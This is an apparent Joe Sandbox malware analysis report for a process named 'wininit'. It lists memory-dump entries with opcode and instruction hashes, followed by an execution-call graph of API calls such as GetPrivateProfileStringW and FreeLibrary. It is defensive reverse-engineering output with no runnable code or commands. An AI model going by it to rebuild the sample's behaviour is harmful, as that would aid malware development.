                                                      • Instruction Fuzzy Hash: 2431CAB4D002189FCF14CFA9E984AEEFBB1AF49314F24852AE819B7340C735A945CF94
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 001CD666
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 412f2bde841be854938bf8d26ead360c7338a8295f2c544ccb067bb40a077835
                                                      • Instruction ID: 1b5d4d2d31fb196ea74e23729a042780e52424ac51d3b217f5b48db858fdb73f
                                                      • Opcode Fuzzy Hash: 412f2bde841be854938bf8d26ead360c7338a8295f2c544ccb067bb40a077835
                                                      • Instruction Fuzzy Hash: 2E31CBB4D002189FCF14CFA9E984AEEFBB5AF49314F24942AE818B7300D735A905CF94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (
                                                      • API String ID: 0-3887548279
                                                      • Opcode ID: 33a3750f93458da8369c286b4e2dac6f969af9164b7019b1b156f3881ddf7e76
                                                      • Instruction ID: 5a4262b9034e04ae367f0e92f1bd4cd48aa78ae09059afc7d4c14fbae58e216a
                                                      • Opcode Fuzzy Hash: 33a3750f93458da8369c286b4e2dac6f969af9164b7019b1b156f3881ddf7e76
                                                      • Instruction Fuzzy Hash: 50F0CF35909218DFDB20CF54C884FE8BBB8EB49314F2491D9D54DA3252C7319E81DF20
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27a0084df2b56a8e3682ad3ac6f6c8d719ec430acce88125880e329250d550ca
                                                      • Instruction ID: 55d372f0fa7aa58d0e5be9b98f5d7999179b68cbf43afd49cc07e6d15280195d
                                                      • Opcode Fuzzy Hash: 27a0084df2b56a8e3682ad3ac6f6c8d719ec430acce88125880e329250d550ca
                                                      • Instruction Fuzzy Hash: 66410635D4431ADFCB64CF55CC80BE8BBB5AF99300F2492EA9609A6241EB709AC5DF50
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3795e966769af2014b4cb60390f308fef39c216c01eb3f8e3939a8c766fa631
                                                      • Instruction ID: e2492ba57c95e5639fe9342d1424b754d2fd3ddb683c5e54dd4b2ed8dfd1ddd6
                                                      • Opcode Fuzzy Hash: f3795e966769af2014b4cb60390f308fef39c216c01eb3f8e3939a8c766fa631
                                                      • Instruction Fuzzy Hash: 2541D074944229CFCB61CF54C884BECBBB5BB59304F2081EAD64AA7291DBB09AC4DF54
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388136993.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_17d000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                      • Instruction ID: 46e9946be57261d5209dbc6b84a9c910d9bf55ea884654932b9c3cc7d8bb4c1b
                                                      • Opcode Fuzzy Hash: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                      • Instruction Fuzzy Hash: 3521B0B5604248AFDB15DF14E9C0B26BBB5EF84314F24C5A9E8494B256C336D847CB61
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388136993.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_17d000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                      • Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
                                                      • Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                      • Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78dc8a11e792c787fa8c835a42ff3b4f6ba31acb3b87011a41692ebea2d134c5
                                                      • Instruction ID: 0683204acf4988e36b3da49cf01cb5ab392277ad8170287b41cf6faee162413c
                                                      • Opcode Fuzzy Hash: 78dc8a11e792c787fa8c835a42ff3b4f6ba31acb3b87011a41692ebea2d134c5
                                                      • Instruction Fuzzy Hash: 96210734D08218CFDF64CF94C880BEDBBB5FB89304F2490A9D649AB291D7359A85DF50
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388136993.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_17d000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                      • Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
                                                      • Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                      • Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388136993.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_17d000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                      • Instruction ID: 0041194c1817ab7fc62789af46a91491cb852afa837990730b6338af1206f0ea
                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                      • Instruction Fuzzy Hash: 3F117975944284DFDB12CF14D5C4B15BBB1FF84314F28C6A9D8494B656C33AD84ACBA2
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac127bdd2dfa19579eb99ce478c5439b9324826aba7934528e17d6b32e83720f
                                                      • Instruction ID: 8f978b665e88b76d9b45794c7b3283ff2cc3647c82cede6014a8580bd2061a16
                                                      • Opcode Fuzzy Hash: ac127bdd2dfa19579eb99ce478c5439b9324826aba7934528e17d6b32e83720f
                                                      • Instruction Fuzzy Hash: 61116038808254CFCB14CF24C988BE8BBB0FB89315F1491EB844DA7291C7359B85DF60
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d7cee00ee394d9b9b9a487d2e88cefe58150634158f20318aa451ca1df8514f
                                                      • Instruction ID: 2e3aa65d3d0acb0129ab70864fb34831096aa7da8d012cd3d6291ef9990dee0e
                                                      • Opcode Fuzzy Hash: 8d7cee00ee394d9b9b9a487d2e88cefe58150634158f20318aa451ca1df8514f
                                                      • Instruction Fuzzy Hash: E701D2B5904218CFCB14DF58C881BECBBF8AB4D300F148499D60DE7281C3709A85CF54
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b623d3c699b5cc9e9051f19fdbd8ea03ef26cfe3241582b3c42d3b232976db79
                                                      • Instruction ID: b6f545d86f6bd745ed435c1eb597b20e59a6c04651c2e3b6f33b3597a3fde7f4
                                                      • Opcode Fuzzy Hash: b623d3c699b5cc9e9051f19fdbd8ea03ef26cfe3241582b3c42d3b232976db79
                                                      • Instruction Fuzzy Hash: 71F0A4B4E002099FDB40DFA9D9405AEFBF5EB89300F1499AA9958E3344E7319A51DF90
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55eea9914f471042d069419583d33e6dc6dd8a969a581cbe1be75f9192d4d2c5
                                                      • Instruction ID: b598a473fdd6f849493737cf3e96b1a0f01f03f73d6e2df1375510141d9562be
                                                      • Opcode Fuzzy Hash: 55eea9914f471042d069419583d33e6dc6dd8a969a581cbe1be75f9192d4d2c5
                                                      • Instruction Fuzzy Hash: A8F01431908228DFCB61CFA4C884BE9BBB1AB49310F6440EA9549A7291C7359A96DF50
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80a0c0d333ef85b5fb90b696a9a9bf3299e329cf90c12b6c99520660c25ec282
                                                      • Instruction ID: b0d1fb8944888e49d6152728fd2f0ea987944b8f419453a800b458b4ffd99776
                                                      • Opcode Fuzzy Hash: 80a0c0d333ef85b5fb90b696a9a9bf3299e329cf90c12b6c99520660c25ec282
                                                      • Instruction Fuzzy Hash: 34F03478800328CFCB24CF64CD54BD8BBB0BB85311F1481EA891AA7391D7309E86CFA0
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d861493900f91d4c92e2c641ffe8cd68cfc560db73434f11f9b2c57fa0c5a62
                                                      • Instruction ID: 6be04d5d800751112a131311e7b1158f491fc032a2c34bc63ef4fc93943d0c2b
                                                      • Opcode Fuzzy Hash: 5d861493900f91d4c92e2c641ffe8cd68cfc560db73434f11f9b2c57fa0c5a62
                                                      • Instruction Fuzzy Hash: 03F0B275904218CFDBA0CF54C884BECBBB4BB49301F6080EAD90DA7251C731AE85CF54
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92a635e970559874cfd6d54805c5398944ef9fdf737989b09704d7f2d03307fe
                                                      • Instruction ID: 032f1e4484eb62a50f6db49efe5bd435fc826b8c0588c1cd1f538517cff7c67f
                                                      • Opcode Fuzzy Hash: 92a635e970559874cfd6d54805c5398944ef9fdf737989b09704d7f2d03307fe
                                                      • Instruction Fuzzy Hash: 40F01C34905228CFDB60CF64CD44BE9BBB5AB49304F2880EA854EA3255C7329E85DF64
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.391633296.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_d40000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf9785039a4578544bf8b8b6033df88c6889ffa026a446ee572a1abcae723a2f
                                                      • Instruction ID: 42837131f8d3c618c87ff09e0a2ab26e3e7923fb706a35cabb8fe3b6d84a93fb
                                                      • Opcode Fuzzy Hash: cf9785039a4578544bf8b8b6033df88c6889ffa026a446ee572a1abcae723a2f
                                                      • Instruction Fuzzy Hash: 0AE06D34904219CFCB54CF14C988BE8BBF4AB58300F5480E9894D93281DB349E85DF20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Y>0
                                                      • API String ID: 0-1250427286
                                                      • Opcode ID: 54f39cbbb428273acb590d9398bc97733bbe3e9783f1208d03d51c759519f150
                                                      • Instruction ID: 7e766999d8d1ccb592a2eaddaa97d76ab9193ee250d84a954219286314d8d2ec
                                                      • Opcode Fuzzy Hash: 54f39cbbb428273acb590d9398bc97733bbe3e9783f1208d03d51c759519f150
                                                      • Instruction Fuzzy Hash: 68E1FA74E006598FCB14DFA9C590AAEFBB2FF89314F248169D819A7356D730AD41CFA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: z|>
                                                      • API String ID: 0-1134487427
                                                      • Opcode ID: d8a1dff9647f350967ca826610c563de644ef0ace603a7cf9f08f4ff7881cd64
                                                      • Instruction ID: 0337a3b8dd6d59d2409c9b31ed22777073f30b64903fc3a6648c4b3f0fed36b8
                                                      • Opcode Fuzzy Hash: d8a1dff9647f350967ca826610c563de644ef0ace603a7cf9f08f4ff7881cd64
                                                      • Instruction Fuzzy Hash: E9E10A74E006598FCB14DFA9D580AAEFBB2FF89304F248169D919AB356D730AD41CF60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fo_N
                                                      • API String ID: 0-3502626514
                                                      • Opcode ID: d1759ab44f3105b43b6b92597c37a0aff1c6cb882363f98507f35df06c0c52af
                                                      • Instruction ID: 1f8783434feadb1b3771724f8ddf107dac7a71ee2f4e6c6df063394ce95295a5
                                                      • Opcode Fuzzy Hash: d1759ab44f3105b43b6b92597c37a0aff1c6cb882363f98507f35df06c0c52af
                                                      • Instruction Fuzzy Hash: E9E10A74E006598FCB14DFA9C590AAEFBB2FF89304F248169D819A7356D730AD41CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e0ee330bcdb03d06f8b0458e9ffa647836243edb4a066e1cb9808b8961053f6
                                                      • Instruction ID: ca0a280bda675d62d9cdfb8ead0e878d10962dac05f50323cfa3df219d34fda6
                                                      • Opcode Fuzzy Hash: 5e0ee330bcdb03d06f8b0458e9ffa647836243edb4a066e1cb9808b8961053f6
                                                      • Instruction Fuzzy Hash: 65E11B74E005598FCB14DFA9C580AADFBB2FF89310F248169D819A7356D731AD41CFA0
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d00ee6b1ca8ba8c7a93d3bdddf37a441774d90b3fa7d750ce9e1bccf6762710
                                                      • Instruction ID: b1183e13af76624769761be0d3d40ee709c9f52cd067b3f916e80769d21651bf
                                                      • Opcode Fuzzy Hash: 5d00ee6b1ca8ba8c7a93d3bdddf37a441774d90b3fa7d750ce9e1bccf6762710
                                                      • Instruction Fuzzy Hash: 83E1EA74E006598FCB14DFA9C590AADFBB2FF89304F248169D919AB356D730AD41CFA0

                                                      Execution Graph

                                                      Execution Coverage:33.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:4.4%
                                                      Total number of Nodes:1845
                                                      Total number of Limit Nodes:99
                                                      execution_graph 9655 40c640 9656 404bee 7 API calls 9655->9656 9657 40c656 9656->9657 9658 40c70f 9657->9658 9659 404bee 7 API calls 9657->9659 9660 40c66b 9659->9660 9661 40c708 9660->9661 9663 404bee 7 API calls 9660->9663 9662 402bab 2 API calls 9661->9662 9662->9658 9664 40c683 9663->9664 9666 404bee 7 API calls 9664->9666 9669 40c701 9664->9669 9665 402bab 2 API calls 9665->9661 9670 40c694 9666->9670 9667 40c6f8 9668 402bab 2 API calls 9667->9668 9668->9669 9669->9665 9670->9667 9682 40c522 9670->9682 9672 40c6a9 9673 40c6ef 9672->9673 9674 405872 4 API calls 9672->9674 9675 402bab 2 API calls 9673->9675 9676 40c6c5 9674->9676 9675->9667 9677 405872 4 API calls 9676->9677 9678 40c6d5 9677->9678 9679 405872 4 API calls 9678->9679 9680 40c6e7 9679->9680 9681 402bab 2 API calls 9680->9681 9681->9673 9683 402b7c 2 API calls 9682->9683 9684 40c542 9683->9684 9684->9672 8300 409046 8313 413b28 8300->8313 8302 40906d 8304 405b6f 6 API calls 8302->8304 8303 40904e 8303->8302 8305 403fbf 7 API calls 8303->8305 8306 40907c 8304->8306 8305->8302 8307 409092 8306->8307 8317 409408 8306->8317 8309 4090a3 8307->8309 8312 402bab 2 API calls 8307->8312 8311 402bab 2 API calls 8311->8307 8312->8309 8314 413b31 8313->8314 8315 413b38 8313->8315 8316 404056 7 API calls 8314->8316 8315->8303 8316->8315 8318 409413 8317->8318 8319 40908c 8318->8319 8331 409d36 8318->8331 8319->8311 8330 40945c 8437 40a35d 8330->8437 8332 409d43 8331->8332 8333 40a35d 5 API calls 8332->8333 8334 409d55 8333->8334 8335 4031e5 4 API calls 8334->8335 8336 409d8b 8335->8336 8337 4031e5 4 API calls 8336->8337 8338 409dd0 8337->8338 8339 405b6f 6 API calls 8338->8339 8370 409423 8338->8370 8342 409df7 8339->8342 8340 409e1c 8341 4031e5 4 API calls 8340->8341 8340->8370 8343 409e62 8341->8343 8342->8340 8344 402bab 2 API calls 8342->8344 8345 4031e5 4 API calls 8343->8345 8344->8340 8346 409e82 8345->8346 8347 4031e5 4 API calls 8346->8347 8348 409ea2 8347->8348 8349 4031e5 4 API calls 8348->8349 8350 409ec2 8349->8350 8351 4031e5 4 API calls 8350->8351 8352 409ee2 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409f02 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409f22 8355->8356 8357 4031e5 4 API calls 8356->8357 8360 409f42 8357->8360 8358 40a19b 8359 408b2c 5 API calls 8358->8359 8359->8370 8360->8358 8361 409fa3 8360->8361 8362 405b6f 6 API calls 8361->8362 8361->8370 8363 409fbd 8362->8363 8364 40a02c 8363->8364 8365 402bab 2 API calls 8363->8365 8366 4031e5 4 API calls 8364->8366 8392 40a16d 8364->8392 8368 409fd7 8365->8368 8369 40a070 8366->8369 8367 402bab 2 API calls 8367->8370 8371 405b6f 6 API calls 8368->8371 8372 4031e5 4 API calls 8369->8372 8370->8330 8393 4056bf 8370->8393 8374 409fe5 8371->8374 8373 40a090 8372->8373 8375 4031e5 4 API calls 8373->8375 8374->8364 8376 402bab 2 API calls 8374->8376 8377 40a0b0 8375->8377 8378 409fff 8376->8378 8381 4031e5 4 API calls 8377->8381 8379 405b6f 6 API calls 8378->8379 8380 40a00d 8379->8380 8380->8364 8383 40a021 8380->8383 8382 40a0d0 8381->8382 8385 4031e5 4 API calls 8382->8385 8384 402bab 2 API calls 8383->8384 8384->8370 8386 40a0f0 8385->8386 8387 4031e5 4 API calls 8386->8387 8388 40a110 8387->8388 8389 4031e5 4 API calls 8388->8389 8390 40a134 8388->8390 8389->8390 8390->8392 8447 408b2c 8390->8447 8392->8367 8392->8370 8394 402b7c 2 API calls 8393->8394 8395 4056cd 8394->8395 8396 402b7c 2 API calls 8395->8396 8397 4056d4 8395->8397 8396->8397 8398 408c4d 8397->8398 8399 413ba4 7 API calls 8398->8399 8400 408c5c 8399->8400 8401 408f02 8400->8401 8402 408f3a 8400->8402 8405 40903e 8400->8405 8403 405b6f 6 API calls 8401->8403 8404 405b6f 6 API calls 8402->8404 8406 408f0c 8403->8406 8419 408f51 8404->8419 8421 413aca 8405->8421 8406->8405 8407 40a1b6 15 API calls 8406->8407 8409 408f31 8406->8409 8407->8409 8408 402bab 2 API calls 8408->8405 8409->8408 8410 405b6f 6 API calls 8410->8419 8412 409031 8413 402bab 2 API calls 8412->8413 8413->8409 8414 409022 8415 402bab 2 API calls 8414->8415 8416 409028 8415->8416 8417 402bab 2 API calls 8416->8417 8417->8409 8418 402bab GetProcessHeap HeapFree 8418->8419 8419->8405 8419->8409 8419->8410 8419->8412 8419->8414 8419->8418 8450 4044ee 8419->8450 8460 40a1b6 8419->8460 8422 413ad7 8421->8422 8430 409451 8421->8430 8423 405781 4 API calls 8422->8423 8424 413af0 8423->8424 8425 405781 4 API calls 8424->8425 8426 413afe 8425->8426 8427 405762 4 API calls 8426->8427 8428 413b0e 8427->8428 8429 405781 4 API calls 8428->8429 8428->8430 8429->8430 8431 405695 8430->8431 8432 4056a0 8431->8432 8433 4056b9 8431->8433 8434 402bab 2 API calls 8432->8434 8433->8330 8435 4056b3 8434->8435 8436 402bab 2 API calls 8435->8436 8436->8433 8438 40a368 8437->8438 8439 40a39a 8437->8439 8444 4031e5 4 API calls 8438->8444 8440 4031e5 4 API calls 8439->8440 8445 40a3af 8439->8445 8440->8445 8441 408b2c 5 API calls 8443 40a3ca 8441->8443 8442 40a38a 8442->8319 8443->8442 8446 408b2c 5 API calls 8443->8446 8444->8442 8445->8441 8445->8443 8446->8442 8448 4031e5 4 API calls 8447->8448 8449 408b3e FreeLibrary 8448->8449 8449->8392 8451 402b7c 2 API calls 8450->8451 8452 404512 8451->8452 8454 404585 GetLastError 8452->8454 8455 402bab 2 API calls 8452->8455 8458 402b7c 2 API calls 8452->8458 8459 40457c 8452->8459 8494 4044a7 8452->8494 8456 404592 8454->8456 8454->8459 8455->8452 8457 402bab 2 API calls 8456->8457 8457->8459 8458->8452 8459->8419 8461 40a202 8460->8461 8462 40a1c3 8460->8462 8497 405f08 8461->8497 8464 405b6f 6 API calls 8462->8464 8466 40a1d0 8464->8466 8465 40a1fc 8465->8419 8466->8465 8469 40a1f3 8466->8469 8504 40a45b 8466->8504 8468 40a333 8470 402bab 2 API calls 8468->8470 8472 402bab 2 API calls 8469->8472 8470->8465 8472->8465 8473 405b6f 6 API calls 8475 40a245 8473->8475 8474 40a25d 8476 405b6f 6 API calls 8474->8476 8475->8474 8477 413a58 14 API calls 8475->8477 8482 40a26b 8476->8482 8478 40a257 8477->8478 8481 402bab 2 API calls 8478->8481 8479 40a28b 8480 405b6f 6 API calls 8479->8480 8487 40a297 8480->8487 8481->8474 8482->8479 8483 40a284 8482->8483 8616 40955b 8482->8616 8485 402bab 2 API calls 8483->8485 8485->8479 8486 405b6f 6 API calls 8491 40a2b7 8486->8491 8488 40a2b0 8487->8488 8487->8491 8623 40968e 8487->8623 8489 402bab 2 API calls 8488->8489 8489->8491 8491->8468 8491->8486 8493 402bab 2 API calls 8491->8493 8633 4098a7 8491->8633 8493->8491 8495 4031e5 4 API calls 8494->8495 8496 4044b9 GetPrivateProfileStringW 8495->8496 8496->8452 8498 4031e5 4 API calls 8497->8498 8499 405f1d 8498->8499 8500 402b7c 2 API calls 8499->8500 8503 405f55 8499->8503 8501 405f36 8500->8501 8502 4031e5 4 API calls 8501->8502 8501->8503 8502->8503 8503->8465 8503->8468 8503->8473 8503->8474 8642 40642c 8504->8642 8506 40a469 8507 40c4ff 8506->8507 8645 4047e6 8506->8645 8507->8469 8510 4040bb 13 API calls 8511 40bf88 8510->8511 8511->8507 8512 403c90 9 API calls 8511->8512 8513 40bfaa 8512->8513 8514 402b7c 2 API calls 8513->8514 8516 40bfc1 8514->8516 8515 40c4f3 8517 403f9e 5 API calls 8515->8517 8518 40c3aa 8516->8518 8652 40a423 8516->8652 8517->8507 8518->8515 8521 4056bf 2 API calls 8518->8521 8525 40c4e3 8518->8525 8519 402bab 2 API calls 8519->8515 8523 40c3d2 8521->8523 8523->8525 8527 4040bb 13 API calls 8523->8527 8524 405f08 4 API calls 8526 40c005 8524->8526 8525->8519 8528 40c021 8526->8528 8655 40a43f 8526->8655 8529 40c3f3 8527->8529 8531 4031e5 4 API calls 8528->8531 8532 40c4d1 8529->8532 8712 405a52 8529->8712 8536 40c034 8531->8536 8535 413aca 4 API calls 8532->8535 8539 40c4dd 8535->8539 8542 4031e5 4 API calls 8536->8542 8537 40c411 8717 405a87 8537->8717 8538 402bab 2 API calls 8538->8528 8541 405695 2 API calls 8539->8541 8541->8525 8548 40c04d 8542->8548 8543 40c4b3 8544 402bab 2 API calls 8543->8544 8546 40c4cb 8544->8546 8545 405a52 4 API calls 8556 40c423 8545->8556 8547 403f9e 5 API calls 8546->8547 8547->8532 8550 4031e5 4 API calls 8548->8550 8549 405a87 4 API calls 8549->8556 8551 40c085 8550->8551 8552 4031e5 4 API calls 8551->8552 8554 40c09c 8552->8554 8553 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8553->8556 8557 4031e5 4 API calls 8554->8557 8555 402bab 2 API calls 8555->8556 8556->8543 8556->8545 8556->8549 8556->8553 8556->8555 8558 40c0b3 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c0ca 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c0e7 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c100 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c119 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c132 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c14b 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c164 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c17d 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c196 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1af 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1c8 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c1de 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c1f4 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c20d 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c226 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c23f 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c258 8591->8592 8593 4031e5 4 API calls 8592->8593 8594 40c273 8593->8594 8595 4031e5 4 API calls 8594->8595 8596 40c28a 8595->8596 8597 4031e5 4 API calls 8596->8597 8600 40c2d5 8597->8600 8598 40c3a2 8599 402bab 2 API calls 8598->8599 8599->8518 8600->8598 8601 4031e5 4 API calls 8600->8601 8602 40c315 8601->8602 8603 40c38b 8602->8603 8658 404866 8602->8658 8605 403c40 5 API calls 8603->8605 8607 40c397 8605->8607 8608 403c40 